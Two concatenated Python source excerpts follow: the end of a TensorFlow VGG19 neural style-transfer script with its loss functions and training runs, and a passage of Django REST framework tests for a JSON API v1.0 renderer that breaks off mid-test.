        weights = np.load('./weight/' + f'keras_{idx}.npy')
        sess.run(vgg19net.VARIABLE_list[idx].assign(weights))
# Load the frozen weights once at import time.
# only run once
print('read fixed weights from pre-trained model:')
read_pretrained_weight()
# define some help functions
def check_see():
    """Visual sanity check: plot channel 32 of the first 12 feature maps for
    the image currently assigned to `img`."""
    plt.figure(figsize=(20, 10))
    for idx in range(12):
        plt.subplot(3, 4, idx + 1)
        fmap = sess.run(vgg19net.TENSOR_list[idx])[0, :, :, 32]
        normed = (fmap - fmap.min()) / (fmap.max() - fmap.min())
        plt.imshow(normed, cmap='gray')
    plt.show()
# See the network structure (one line per activation tensor).
print('vgg19net.TENSOR_list:')
for i,o in enumerate(vgg19net.TENSOR_list):
    print('{0:>2}'.format(i),':',o)
# Debug helpers kept for reference:
# for i,v in enumerate(tf.global_variables()):
# print('trainable:{0} {1:>2}'.format(v.trainable,i),':',v)
# for i,v in enumerate(tf.trainable_variables()):
# print('trainable:{0} {1:>2}'.format(v.trainable,i),':',v)
# for i,v in enumerate(vgg19net.VARIABLE_list):
# print('trainable:{0} {1:>2}'.format(v.trainable,i),':',v)
# _ = sess.run(img.assign(load_img('content1.jpg')))
# check_see()
# _ = sess.run(img.assign(load_img('style5.jpg')))
# check_see()
def load_img(path):
    '''
    Load a jpg/png/bmp image (pixel range [0, 255]) — or a pre-saved .npy
    checkpoint — as a (1, H, W, 3) float32 array, shifted by -128 so values
    are roughly zero-centered.
    '''
    # .npy checkpoints are already in network space; return them untouched.
    if path.split('.')[-1] == 'npy':
        return np.load(path)
    # Robustness fix: force 3-channel RGB so grayscale or RGBA files do not
    # break the (H, W, 3) assignment below.
    img = Image.open(path).convert('RGB').resize((img_W, img_H))
    img_np = np.zeros((1, img_H, img_W, img_C), dtype=np.float32)
    img_np[0, :, :, :] = np.array(img)
    return img_np - 128.0
def save_img(path, value):
    '''
    Shift the (1, H, W, 3) tensor back by +128, clip to [0, 255] and write it
    out as an image file.

    The network is assumed to learn brightness/contrast/saturation on its
    own, so the enhancement factors below are identity (1.0).
    '''
    pixels = value[0] + 128.0
    pixels = np.clip(pixels, 0, 255).astype(np.uint8)
    image = Image.fromarray(pixels)
    image = ImageEnhance.Color(image).enhance(1.0)
    image = ImageEnhance.Contrast(image).enhance(1.0)
    image = ImageEnhance.Brightness(image).enhance(1.0)
    image.save(path)
def loss_content_func(sess, content_tensor_list):
    '''
    Build the content-loss graph term.

    content_tensor_list rows are (weight, tensor). sess.run(tensor) here
    snapshots the activations for whatever image is currently assigned to
    `img`, so this must be called while the *content* image is loaded.
    param:adjust_parameter: is used for balance the content loss value and the style loss value
    '''
    adjust_parameter = 1.00
    def loss_single_conv(fixed_content, tensor):
        # Squared difference between the frozen content activations and the
        # live activations, normalized by channel count * spatial size.
        num_C = fixed_content.shape[3]
        num_HW = fixed_content.shape[1]*fixed_content.shape[2]
        return (1/(2*num_C*num_HW))*tf.reduce_sum(tf.pow(fixed_content-tensor,2))
    return sum([adjust_parameter*w*loss_single_conv(sess.run(tensor), tensor) for w, tensor in content_tensor_list])
def loss_style_func(sess, style_tensor_list):
    '''
    Build the style-loss graph term (Gatys-style Gram-matrix matching).

    style_tensor_list rows are (weight, tensor). sess.run(tensor) snapshots
    activations for the image currently assigned to `img`, so this must be
    called while the *style* image is loaded.
    '''
    def gram_matrix(F, num_HW, num_C):
        # Flatten spatial dims, then correlate channels: (C, C) Gram matrix.
        F_ik = tf.reshape(F, (num_HW, num_C))
        return tf.matmul(tf.transpose(F_ik), F_ik)
    def loss_single_conv(fixed_content, tensor):
        num_C = fixed_content.shape[3]
        num_HW = fixed_content.shape[1]*fixed_content.shape[2]
        fixed_content_gram = gram_matrix(fixed_content, num_HW, num_C)
        tensor_gram = gram_matrix(tensor, num_HW, num_C)
        # Normalization matches the original neural-style formulation.
        return (1/(4*num_C*num_C*num_HW*num_HW))*tf.reduce_sum(tf.pow(fixed_content_gram-tensor_gram,2))
    return sum([w*loss_single_conv(sess.run(tensor), tensor) for w, tensor in style_tensor_list])
def set_content_tensor_list(_select, _weight_list=(0.1, 0.2, 0.3, 0.2, 0.1)):
    '''
    Choose which VGG19 activation tensors (by index into TENSOR_list) define
    the content loss, paired with per-layer weights.

    Later layers are more abstract and have larger receptive fields, so
    weighting early layers keeps the result closer to the content's pixels
    while weighting late layers favors its higher-level structure.
    (NOTE(review): the original Chinese comment repeated the same sentence
    for both cases — presumably a copy-paste slip.)
    Examples: _select = [0,1,2,3,4]  or  _select = [11,12,13,14,15]

    Fix: the default weight list is now a tuple — a mutable default list is
    a shared-state hazard.
    '''
    global content_tensor_list
    content_tensor_list = [[vgg19net.TENSOR_list[i]] for i in _select]
    # Prepend each weight so rows become (weight, tensor).
    content_tensor_list = np.hstack((np.array(_weight_list).reshape(-1,1), content_tensor_list))
    print('the content_tensor_list is set as follow:')
    for w, t in content_tensor_list:
        print(w, t)
def set_style_tensor_list(_select, _weight_list=(0.1, 0.2, 0.3, 0.2, 0.1)):
    '''
    Choose which VGG19 activation tensors (by index into TENSOR_list) define
    the style loss, paired with per-layer weights.

    Weighting early layers emphasizes coarse style features such as color
    blocks; weighting late layers emphasizes texture-like detail.
    Examples: _select = [0,1,2,3,4]  or  _select = [11,12,13,14,15]

    Fix: the default weight list is now a tuple — a mutable default list is
    a shared-state hazard.
    '''
    global style_tensor_list
    style_tensor_list = [[vgg19net.TENSOR_list[i]] for i in _select]
    # Prepend each weight so rows become (weight, tensor).
    style_tensor_list = np.hstack((np.array(_weight_list).reshape(-1,1), style_tensor_list))
    print('the style_tensor_list is set as follow:')
    for w, t in style_tensor_list:
        print(w, t)
def set_content_style_loss(content_img, style_img, dir_label):
    """Snapshot content/style activations, build the blended loss and Adam
    step op, and prepare the output directory.

    Must be called before train_loop(); it sets the module globals that
    train_loop() relies on.
    """
    global loss_content, loss_style, loss
    global optimizer_step, savedir
    # Load the content image into `img`, then freeze its activations in the loss.
    _ = sess.run(img.assign(load_img(content_img)))
    loss_content = loss_content_func(sess, content_tensor_list)
    # Same for the style image.
    _ = sess.run(img.assign(load_img(style_img)))
    loss_style = loss_style_func(sess, style_tensor_list)
    # beta -> 1 favors content, beta -> 0 favors style.
    loss = beta_placeholder*loss_content + (1-beta_placeholder)*loss_style
    optimizer = tf.train.AdamOptimizer(lr_placeholder)
    optimizer_step = optimizer.minimize(loss)
    sess.run(tf.variables_initializer(optimizer.variables()))
    pair_name = content_img.split('.')[0] + '-' + style_img.split('.')[0]
    savedir = './output/' + dir_label + pair_name + '/'
    # Robustness fix: makedirs (was mkdir) also creates ./output/ when missing.
    if not os.path.isdir(savedir):
        os.makedirs(savedir)
    # Typo fix in the status message: "flie" -> "file".
    print('loss_content and loss_style have been set by file ' + content_img + ' and ' + style_img)
# total_iter_num = 0
def train_loop(img_names, beta, learning_rate, loop_num):
    """Run `loop_num` Adam steps starting from the image in img_names[0],
    periodically saving previews and checkpoints named after img_names[1].

    Relies on module globals set by set_content_style_loss() and on the
    global step counter `total_iter_num` (caller must initialise it before
    the first call).
    """
    global total_iter_num
    input_img_n, output_img_n = img_names
    sess.run(img.assign(load_img(input_img_n)))
    for i in range(total_iter_num, total_iter_num+loop_num):
        sess.run(optimizer_step, feed_dict={beta_placeholder:beta, lr_placeholder:learning_rate})
        total_iter_num = total_iter_num + 1
        # Save a jpg preview every 100 steps (and on the very first step).
        if i % 100 == 99 or i == 0:
            output = sess.run(img)
            save_img(path=savedir+output_img_n+f'_iter_{i}.jpg', value=output)
        # Every 1000 steps: raw .npy checkpoint plus a loss log line.
        # (`output` exists here because i%1000==999 implies i%100==99 above.)
        if i % 1000 == 999:
            np.save(savedir+'_'+output_img_n+f'_{i}.npy', output)
            loss_content_v, loss_style_v, loss_v = sess.run([loss_content, loss_style, loss], feed_dict={beta_placeholder:beta})
            msg = 'i:{0:5}, loss_content:{1}, loss_style:{2}, loss:{3}'.format(i, loss_content_v, loss_style_v, loss_v)
            print(msg)
            with open(savedir+'_'+output_img_n+'_recording.txt','a') as flie:
                flie.write(msg + '\n')
# ----- training -------------------------
def train(content_img, style_img, dir_label, beta_list=None):
    """Run the full style-transfer schedule for one content/style pair.

    For each beta in beta_list (default: a sweep from style-heavy to
    content-heavy), optimizes starting from a noised copy of the content image
    through a decreasing learning-rate schedule (2.1 -> 0.8 -> 0.4), resuming
    each stage from the last .npy snapshot written by train_loop.
    """
    global total_iter_num
    set_content_style_loss(content_img, style_img, dir_label)
    # Blend the content image with uniform noise so the optimizer does not
    # start from a degenerate (already-converged-for-content) point.
    noise = 0.5
    input_img = load_img(content_img)
    input_img = (1-noise)*input_img + noise*np.random.uniform(input_img.min(),input_img.max(),size=input_img.shape)
    save_img(savedir+'_input_img.jpg', input_img)
    # BUG FIX: compare against None with 'is', not '=='.
    if beta_list is None:
        beta_list = 0.0003, 0.0021, 0.0091, 0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961
    for beta_value in beta_list:
        total_iter_num = 0
        output_img_n = 'beta' + str(beta_value)
        print('beta:', beta_value)
        # Stage 1: coarse optimization from the noised input.
        img_names = (savedir+'_input_img.jpg', output_img_n)
        train_loop(img_names, beta=beta_value, learning_rate=2.1, loop_num=1000*2)
        # Stages 2-3: refine from the latest snapshot at smaller rates.
        img_names = (savedir+'_'+output_img_n+f'_{total_iter_num-1}.npy', output_img_n)
        train_loop(img_names, beta=beta_value, learning_rate=0.8, loop_num=1000*2)
        img_names = (savedir+'_'+output_img_n+f'_{total_iter_num-1}.npy', output_img_n)
        train_loop(img_names, beta=beta_value, learning_rate=0.4, loop_num=1000*1)
# total_iter_num = 0
# img_names = (savedir+'_'+output_img_n+f'_{}.npy', output_img_n)
# train_loop(img_names, beta=beta_value, learning_rate=0.001, loop_num=1000*6)
# Kick off the experiment runs configured below.
print('start training:')
# Can fast style transfer really give good results within 10 seconds?
# https://zhuanlan.zhihu.com/p/23651687
# vgg19net.TENSOR_list:
# 0 : Tensor("conv1_0/Relu:0", shape=(1, 500, 800, 64), dtype=float32)
# 1 : Tensor("conv1_1/Relu:0", shape=(1, 500, 800, 64), dtype=float32)
# 2 : Tensor("conv2_0/Relu:0", shape=(1, 250, 400, 128), dtype=float32)
# 3 : Tensor("conv2_1/Relu:0", shape=(1, 250, 400, 128), dtype=float32)
# 4 : Tensor("conv3_0/Relu:0", shape=(1, 125, 200, 256), dtype=float32)
# 5 : Tensor("conv3_1/Relu:0", shape=(1, 125, 200, 256), dtype=float32)
# 6 : Tensor("conv3_2/Relu:0", shape=(1, 125, 200, 256), dtype=float32)
# 7 : Tensor("conv3_3/Relu:0", shape=(1, 125, 200, 256), dtype=float32)
# 8 : Tensor("conv4_0/Relu:0", shape=(1, 63, 100, 512), dtype=float32)
# 9 : Tensor("conv4_1/Relu:0", shape=(1, 63, 100, 512), dtype=float32)
# 10 : Tensor("conv4_2/Relu:0", shape=(1, 63, 100, 512), dtype=float32)
# 11 : Tensor("conv4_3/Relu:0", shape=(1, 63, 100, 512), dtype=float32)
# 12 : Tensor("conv5_0/Relu:0", shape=(1, 32, 50, 512), dtype=float32)
# 13 : Tensor("conv5_1/Relu:0", shape=(1, 32, 50, 512), dtype=float32)
# 14 : Tensor("conv5_2/Relu:0", shape=(1, 32, 50, 512), dtype=float32)
# 15 : Tensor("conv5_3/Relu:0", shape=(1, 32, 50, 512), dtype=float32)
# set_content_tensor_list(_select=[2, 3, 4, 5, 6], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# set_style_tensor_list( _select=[6, 8, 9, 10, 12], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# Waiting to resume training from iteration 4000
# train('content1.jpg', 'style1_starry.jpg', dir_label='test1--')
# train('content1.jpg', 'style2_udnie.jpg', dir_label='test1--')
# train('content1.jpg', 'style3_muse.jpg', dir_label='test1--')
# train('content1.jpg', 'style4_mosaic.jpg', dir_label='test1--')
# train('content1.jpg', 'style5_cubist.jpg', dir_label='test1--')
# train('content2.jpg', 'style1_starry.jpg', dir_label='test1--')
# train('content2.jpg', 'style2_udnie.jpg', dir_label='test1--')
# train('content2.jpg', 'style3_muse.jpg', dir_label='test1--')
# train('content2.jpg', 'style4_mosaic.jpg', dir_label='test1--')
# train('content2.jpg', 'style5_cubist.jpg', dir_label='test1--')
# train('content0.jpg', 'style1_starry.jpg', dir_label='test1--')
# train('content0.jpg', 'style2_udnie.jpg', dir_label='test1--')
# train('content0.jpg', 'style3_muse.jpg', dir_label='test1--')
# train('content0.jpg', 'style4_mosaic.jpg', dir_label='test1--')
# train('content0.jpg', 'style5_cubist.jpg', dir_label='test1--')
# set_content_tensor_list(_select=[2, 3, 4, 5, 6], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# set_style_tensor_list( _select=[10, 10, 12, 14, 15], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# train('content1.jpg', 'style1_starry.jpg', dir_label='test2--')
# train('content1.jpg', 'style2_udnie.jpg', dir_label='test2--')
# train('content1.jpg', 'style3_muse.jpg', dir_label='test2--')
# train('content1.jpg', 'style4_mosaic.jpg', dir_label='test2--')
# train('content1.jpg', 'style5_cubist.jpg', dir_label='test2--')
# train('content2.jpg', 'style1_starry.jpg', dir_label='test2--')
# train('content2.jpg', 'style2_udnie.jpg', dir_label='test2--')
# train('content2.jpg', 'style3_muse.jpg', dir_label='test2--')
# train('content2.jpg', 'style4_mosaic.jpg', dir_label='test2--', beta_list=[0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content2.jpg', 'style5_cubist.jpg', dir_label='test2--')
# train('content0.jpg', 'style1_starry.jpg', dir_label='test2--', beta_list=[0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content0.jpg', 'style2_udnie.jpg', dir_label='test2--')
# train('content0.jpg', 'style3_muse.jpg', dir_label='test2--')
# train('content0.jpg', 'style4_mosaic.jpg', dir_label='test2--')
# train('content0.jpg', 'style5_cubist.jpg', dir_label='test2--', beta_list=[0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# set_content_tensor_list(_select=[5, 8, 11, 13, 14], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# set_style_tensor_list( _select=[8, 10, 12, 14, 15], _weight_list=[0.16, 0.22, 0.31, 0.22, 0.16])
# train('content1.jpg', 'style1_starry.jpg', dir_label='test3--')
# train('content1.jpg', 'style2_udnie.jpg', dir_label='test3--', beta_list=[0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content1.jpg', 'style3_muse.jpg', dir_label='test3--', beta_list=[0.6001, 0.8801, 0.9601, 0.9961])
# train('content1.jpg', 'style4_mosaic.jpg', dir_label='test3--')
# train('content1.jpg', 'style5_cubist.jpg', dir_label='test3--')
# train('content2.jpg', 'style1_starry.jpg', dir_label='test3--')
# train('content2.jpg', 'style2_udnie.jpg', dir_label='test3--')
# train('content2.jpg', 'style3_muse.jpg', dir_label='test3--', beta_list=[0.0021, 0.0091, 0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content2.jpg', 'style4_mosaic.jpg', dir_label='test3--')
# train('content2.jpg', 'style5_cubist.jpg', dir_label='test3--')
# train('content0.jpg', 'style1_starry.jpg', dir_label='test3--', beta_list=[0.6001, 0.8801, 0.9601, 0.9961])
# train('content0.jpg', 'style2_udnie.jpg', dir_label='test3--')
# train('content0.jpg', 'style3_muse.jpg', dir_label='test3--', beta_list=[0.9961])
# train('content0.jpg', 'style4_mosaic.jpg', dir_label='test3--', beta_list=[0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content0.jpg', 'style5_cubist.jpg', dir_label='test3--')
# Use the same five VGG feature layers (see the tensor listing above) with
# equal weights for both the content loss and the style loss.
set_content_tensor_list(_select=[3, 6, 8, 11, 14], _weight_list=[0.31, 0.31, 0.31, 0.31, 0.31])
set_style_tensor_list( _select=[3, 6, 8, 11, 14], _weight_list=[0.31, 0.31, 0.31, 0.31, 0.31])
# 'test4--' combinations already run earlier, kept commented for the record:
# train('content1.jpg', 'style1_starry.jpg', dir_label='test4--')
# train('content1.jpg', 'style2_udnie.jpg', dir_label='test4--')
# train('content1.jpg', 'style3_muse.jpg', dir_label='test4--')
# train('content1.jpg', 'style4_mosaic.jpg', dir_label='test4--')
# train('content1.jpg', 'style5_cubist.jpg', dir_label='test4--', beta_list=[0.0401, 0.1201, 0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
# train('content2.jpg', 'style1_starry.jpg', dir_label='test4--')
# train('content2.jpg', 'style2_udnie.jpg', dir_label='test4--')
# Active runs for this invocation:
train('content2.jpg', 'style3_muse.jpg', dir_label='test4--', beta_list=[0.3601, 0.6001, 0.8801, 0.9601, 0.9961])
train('content2.jpg', 'style4_mosaic.jpg', dir_label='test4--')
train('content2.jpg', 'style5_cubist.jpg', dir_label='test4--')
train('content0.jpg', 'style1_starry.jpg', dir_label='test4--')
train('content0.jpg', 'style2_udnie.jpg', dir_label='test4--')
train('content0.jpg', 'style3_muse.jpg', dir_label='test4--')
train('content0.jpg', 'style4_mosaic.jpg', dir_label='test4--')
train('content0.jpg', 'style5_cubist.jpg', dir_label='test4--')
|
# -*- coding: utf-8 -*-
"""Tests for API renderers."""
from __future__ import unicode_literals
from django.test import RequestFactory
from rest_framework.serializers import ListSerializer
from rest_framework.utils.serializer_helpers import ReturnDict, ReturnList
import mock
from .base import TestCase
from webplatformcompat.v2.renderers import JsonApiV10Renderer
from webplatformcompat.serializers import (
BrowserSerializer, FeatureSerializer, HistoricalBrowserSerializer)
class TestJsonApiV10Renderer(TestCase):
    """Tests for JsonApiV10Renderer, which serializes DRF output as JSON API v1.0.

    Each test builds the renderer input (plain dicts or DRF ReturnDict/
    ReturnList wrappers, as the views would produce) plus a renderer_context,
    then compares the rendered bytes against the expected JSON API document.
    """

    # Media type the renderer is registered for.
    media_type = 'application/vnd.api+json'
    # Root of the v2 API as seen through Django's test client.
    base_url = 'http://testserver/api/v2/'

    def setUp(self):
        self.renderer = JsonApiV10Renderer()

    def full_api_reverse(self, name, **kwargs):
        """Return the fully-qualified (scheme + host) URL for a named API route."""
        return 'http://testserver' + self.api_reverse(name, **kwargs)

    def make_context(
            self, status_code=200, url=None, serializer=FeatureSerializer,
            as_relationship=None, method='get', override_path=None):
        """Build the renderer_context dict that the renderer expects.

        The response is a minimal mock carrying only status_code; the request
        is a real RequestFactory request for the given method and URL.
        """
        response = mock.Mock(spec_set=['status_code'])
        response.status_code = status_code
        request = getattr(RequestFactory(), method)(url or '')
        renderer_context = {
            'response': response,
            'request': request,
            'fields_extra': serializer.get_fields_extra(),
            'as_relationship': as_relationship,
            'override_path': override_path,
        }
        return renderer_context

    def make_list(self, data_list, serializer):
        """Wrap data_list in a ReturnList, as a DRF list view would return."""
        list_serializer = ListSerializer(child=serializer)
        return ReturnList(data_list, serializer=list_serializer)

    def test_paginated_empty(self):
        """An empty paginated list renders [] with count 0 and null paging links."""
        data = {
            'count': 0,
            'next': None,
            'previous': None,
            'results': self.make_list([], BrowserSerializer())
        }
        url = self.full_api_reverse('browser-list')
        context = self.make_context(url=url, serializer=BrowserSerializer)
        output = self.renderer.render(data, self.media_type, context)
        expected = {
            'data': [],
            'links': {
                'self': url,
                'next': None,
                'prev': None,
            },
            'meta': {
                'count': 0,
            }
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_paginated_populated(self):
        """A populated list renders each item with attributes and relationships."""
        browser1 = {
            'id': 1,
            'slug': 'firefox_desktop',
            'name': {'en': 'Firefox for Desktop'},
            'note': None,
            'versions': [100, 101],
            'history_current': 200,
            'history': [200]
        }
        browser2 = {
            'id': 2,
            'slug': 'edge',
            'name': {'en': 'Edge'},
            'note': None,
            'versions': [300, 301],
            'history_current': 400,
            'history': [400]
        }
        results = self.make_list([browser1, browser2], BrowserSerializer())
        data = {
            'count': 2,
            'next': None,
            'previous': None,
            'results': results
        }
        url = self.full_api_reverse('browser-list')
        context = self.make_context(url=url, serializer=BrowserSerializer)
        output = self.renderer.render(data, self.media_type, context)
        expected = {
            'data': [
                {
                    'id': '1',
                    'type': 'browsers',
                    'attributes': {
                        'slug': 'firefox_desktop',
                        'name': {'en': 'Firefox for Desktop'},
                        'note': None,
                    },
                    'relationships': {
                        'versions': {
                            'data': [
                                {'type': 'versions', 'id': '100'},
                                {'type': 'versions', 'id': '101'},
                            ],
                        },
                        'history_current': {
                            'data': {
                                'type': 'historical_browsers', 'id': '200'
                            },
                        },
                        'history': {
                            'data': [
                                {'type': 'historical_browsers', 'id': '200'},
                            ],
                        },
                    },
                    'links': {'self': url + '/1'},
                },
                {
                    'id': '2',
                    'type': 'browsers',
                    'attributes': {
                        'slug': 'edge',
                        'name': {'en': 'Edge'},
                        'note': None,
                    },
                    'relationships': {
                        'versions': {
                            'data': [
                                {'type': 'versions', 'id': '300'},
                                {'type': 'versions', 'id': '301'},
                            ],
                        },
                        'history_current': {
                            'data': {
                                'type': 'historical_browsers', 'id': '400'
                            },
                        },
                        'history': {
                            'data': [
                                {'type': 'historical_browsers', 'id': '400'},
                            ],
                        },
                    },
                    'links': {'self': url + '/2'},
                },
            ],
            'links': {
                'self': url,
                'next': None,
                'prev': None,
            },
            'meta': {
                'count': 2,
            }
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_null_link(self):
        """A null to-one relation renders as data: None with its links intact."""
        data = ReturnDict((
            ('id', 1),
            ('slug', 'web'),
            ('mdn_uri', None),
            ('name', {'en': 'Web'}),
            ('parent', None),
            ('children', [2, 3, 4, 5, 6, 7]),
        ), serializer=FeatureSerializer())
        url = self.full_api_reverse('feature-detail', pk=1)
        output = self.renderer.render(
            data, self.media_type, self.make_context(url=url))
        expected = {
            'links': {'self': url},
            'data': {
                'id': '1',
                'type': 'features',
                'attributes': {
                    'slug': 'web',
                    'mdn_uri': None,
                    'name': {'en': 'Web'},
                },
                'relationships': {
                    'parent': {
                        'data': None,
                        'links': {
                            'self': url + '/relationships/parent',
                            'related': url + '/parent',
                        }
                    },
                    'children': {
                        'data': [
                            {'type': 'features', 'id': '2'},
                            {'type': 'features', 'id': '3'},
                            {'type': 'features', 'id': '4'},
                            {'type': 'features', 'id': '5'},
                            {'type': 'features', 'id': '6'},
                            {'type': 'features', 'id': '7'},
                        ],
                        'links': {
                            'self': url + '/relationships/children',
                            'related': url + '/children',
                        }
                    },
                },
            },
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_empty_data(self):
        """None data renders as an empty body."""
        output = self.renderer.render(
            None, self.media_type, self.make_context())
        self.assertEqual(output.decode('utf8'), '')

    def test_null_id(self):
        """A related view with no related item renders data: None."""
        # Related items with empty relations, such as feature.parent
        # for top-level features
        data = {'id': None}
        url = self.full_api_reverse('feature-parent', pk=1)
        output = self.renderer.render(
            data, self.media_type, self.make_context(url=url))
        expected = {
            'data': None,
            'links': {'self': url}
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_no_relationships(self):
        """A resource without relation fields omits the relationships object."""
        data = ReturnDict((
            ('id', 1),
            ('slug', 'web'),
            ('mdn_uri', None),
            ('name', {'en': 'Web'}),
        ), serializer=FeatureSerializer())
        url = self.full_api_reverse('feature-detail', pk=1)
        output = self.renderer.render(
            data, self.media_type, self.make_context(url=url))
        expected = {
            'links': {'self': url},
            'data': {
                'id': '1',
                'type': 'features',
                'attributes': {
                    'slug': 'web',
                    'mdn_uri': None,
                    'name': {'en': 'Web'},
                },
            },
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_no_attributes(self):
        """A resource with only relation fields omits the attributes object."""
        data = ReturnDict((
            ('id', 2),
            ('parent', 1),
        ), serializer=FeatureSerializer())
        url = self.full_api_reverse('feature-detail', pk=2)
        output = self.renderer.render(
            data, self.media_type, self.make_context(url=url))
        expected = {
            'links': {'self': url},
            'data': {
                'id': '2',
                'type': 'features',
                'relationships': {
                    'parent': {
                        'data': {'type': 'features', 'id': '1'},
                        'links': {
                            'self': self.full_api_reverse(
                                'feature-relationships-parent', pk=2),
                            'related': self.full_api_reverse(
                                'feature-parent', pk=2),
                        }
                    }
                }
            },
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_with_query_string(self):
        """Test that a URL with a query string is properly handled.

        /links/self should have the query string
        /data/relationships/<relation>/links/self should not
        """
        data = ReturnDict((
            ('id', 2),
            ('parent', 1),
        ), serializer=FeatureSerializer())
        url = self.full_api_reverse('feature-detail', pk=2) + '?foo=bar'
        output = self.renderer.render(
            data, self.media_type, self.make_context(url=url))
        expected = {
            'links': {'self': url},
            'data': {
                'id': '2',
                'type': 'features',
                'relationships': {
                    'parent': {
                        'data': {'type': 'features', 'id': '1'},
                        'links': {
                            'self': self.full_api_reverse(
                                'feature-relationships-parent', pk=2),
                            'related': self.full_api_reverse(
                                'feature-parent', pk=2),
                        }
                    }
                }
            },
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_permission_denied(self):
        """A 403 detail message renders as a JSON API errors array."""
        data = {
            'detail': 'You do not have permission to perform this action.'
        }
        output = self.renderer.render(
            data, self.media_type, self.make_context(status_code=403))
        expected = {
            'errors': [
                {
                    'detail': data['detail'],
                    'status': '403'
                }
            ]
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_field_validation_error(self):
        """A field validation error includes a JSON-pointer-style path."""
        data = ReturnDict((
            ('children', ['Set child.parent to add a child feature.']),
        ), serializer=FeatureSerializer())
        output = self.renderer.render(
            data, self.media_type, self.make_context(status_code=400))
        expected = {
            'errors': [
                {
                    'detail': 'Set child.parent to add a child feature.',
                    'path': '/data/relationships/children',
                    'status': '400'
                }
            ]
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_view_extra(self):
        """_view_extra content renders as top-level 'included' and 'meta'."""
        feature2 = {
            'id': 2,
            'slug': 'css',
            'parent': 1
        }
        feature3 = {
            'id': 3,
            'slug': 'js',
            'parent': 1
        }
        data = ReturnDict((
            ('id', 1),
            ('slug', 'web'),
            ('mdn_uri', None),
            ('name', {'en': 'Web'}),
            ('parent', None),
            ('children', [2, 3]),
            ('_view_extra', {
                'features': self.make_list(
                    [feature2, feature3], FeatureSerializer()),
                'meta': {'foo': 'bar'},
            }),
        ), serializer=FeatureSerializer())
        url = self.full_api_reverse('viewfeatures-detail', pk=1)
        output = self.renderer.render(
            data, self.media_type, self.make_context(url=url))
        expected = {
            'links': {
                'self': url
            },
            'data': {
                'id': '1',
                'type': 'features',
                'attributes': {
                    'slug': 'web',
                    'mdn_uri': None,
                    'name': {'en': 'Web'},
                },
                'relationships': {
                    'parent': {
                        'data': None,
                        'links': {
                            'self': url + '/relationships/parent',
                            'related': url + '/parent'
                        }
                    },
                    'children': {
                        'data': [
                            {'type': 'features', 'id': '2'},
                            {'type': 'features', 'id': '3'},
                        ],
                        'links': {
                            'self': url + '/relationships/children',
                            'related': url + '/children'
                        }
                    },
                },
            },
            'included': [
                {
                    'id': '2',
                    'type': 'features',
                    'attributes': {
                        'slug': 'css',
                    },
                    'relationships': {
                        'parent': {
                            'data': {'type': 'features', 'id': '1'},
                        }
                    },
                    'links': {
                        'self': self.full_api_reverse('feature-detail', pk=2),
                    },
                }, {
                    'id': '3',
                    'type': 'features',
                    'attributes': {
                        'slug': 'js',
                    },
                    'relationships': {
                        'parent': {
                            'data': {'type': 'features', 'id': '1'},
                        }
                    },
                    'links': {
                        'self': self.full_api_reverse('feature-detail', pk=3),
                    },
                }
            ],
            'meta': {
                'foo': 'bar'
            }
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_linked_error(self):
        """Errors on included (linked) resources use an /included.* path."""
        data = {
            '_view_extra': {
                'features': {
                    0: {'parent': ['Feature must be a descendant.']},
                }
            }
        }
        output = self.renderer.render(
            data, self.media_type, self.make_context(status_code=400))
        expected = {
            'errors': [{
                'status': '400',
                'path': '/included.features.0.parent',
                'detail': 'Feature must be a descendant.'
            }]
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_subject_error(self):
        """A None key in _view_extra errors maps to the 'subject' path segment."""
        data = {
            '_view_extra': {
                'features': {
                    None: {'children': ['MYSTERY ERROR.']},
                }
            }
        }
        output = self.renderer.render(
            data, self.media_type, self.make_context(status_code=400))
        expected = {
            'errors': [{
                'status': '400',
                'path': '/included.features.subject.children',
                'detail': 'MYSTERY ERROR.'
            }]
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_options(self):
        """An OPTIONS response is wrapped verbatim under 'meta'."""
        data = {
            'actions': {
                'PUT': {
                    # In full OPTIONS response, PUT has all field data
                    'names': {'attributues': 'values'}
                },
            },
            'description': '',
            'name': 'Browser',
            'parses': [
                'application/vnd.api+json',
                'application/x-www-form-urlencoded',
                'multipart/form-data',
            ],
            'renders': ['application/vnd.api+json', 'text/html']
        }
        url = self.api_reverse('browser-detail', pk=1)
        context = self.make_context(
            url=url, serializer=BrowserSerializer, method='options')
        output = self.renderer.render(data, self.media_type, context)
        expected = {'meta': data}
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_as_relationship_none(self):
        """A relationship view with a null to-one relation renders data: None."""
        data = {'parent': None}
        url = self.full_api_reverse('feature-relationships-parent', pk=6)
        context = self.make_context(
            url=url, as_relationship='parent',
            override_path=self.api_reverse('feature-detail', pk=6))
        output = self.renderer.render(data, self.media_type, context)
        expected = {
            'links': {
                'self': url,
                'related': self.full_api_reverse('feature-parent', pk=6),
            },
            'data': None
        }
        self.assertJSONEqual(output.decode('utf8'), expected)

    def test_as_relationship_to_one(self):
        """A relationship view for a to-one relation renders one identifier."""
        data = {'parent': 1}
        url = self.full_api_reverse('feature-relationships-parent', pk=6)
